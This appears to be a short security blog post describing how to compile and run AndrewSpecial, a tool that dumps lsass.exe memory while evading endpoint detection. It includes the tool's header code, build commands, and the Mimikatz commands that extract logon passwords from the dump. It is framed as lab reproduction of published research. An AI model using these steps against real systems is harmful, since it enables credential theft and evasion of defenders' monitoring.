AndrewSpecial – stealthy lsass.exe memory dumping

Ultra short entry here. When reading a very interesting article on bypassing one End Point Security product to silently dump lsass.exe without getting detected

One will want to reproduce the steps of course and since the code is available here :

I have just done that in my lab.

Below might save some seconds if one gets stuck compiling it. (I have used Visual Studio 2013 on Win7 SP1 64bit to build it)

# On Windows build server just download the

Modify AndrewSpecial.h to include the additional #pragma comment (lib, “advapi32.lib”)

#include <Windows.h>
#include <stdio.h>
#include <winternl.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <DbgHelp.h>

#pragma comment (lib, "Dbghelp.lib")
#pragma comment (lib, "ntdll.lib")
#pragma comment (lib, "advapi32.lib")

void getversion_long();
bool AndrewSpecial(const wchar_t * ProcessName);
typedef NTSTATUS(NTAPI* RtlGetVersion_t)(_Out_ PRTL_OSVERSIONINFOW lpVersionInformation);

enum supported_versions
win8 = 0x060200,
win81 = 0x060300,
win10 = 0x0A0000,

Open up the 64bit VS2013 x64 Native Tools Command Prompt  and cd to the source directory

cl *.cpp /DUNICODE

Next we transfer the compiled Andrew.exe binary to our testing lab Windows 10 box and execute it

The resulting Andrew.dmp can be fed to a separate instance of Mimikatz on some other machine as follows

mimikatz # sekurlsa::minidump Andrew.dmp
mimikatz # sekurlsa::logonPasswords

Courtesy of CaledoniaProject


About astr0baby

Please run Adblock or similar... we have been told to do so since Carl Sagan wrote the Contact .
This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.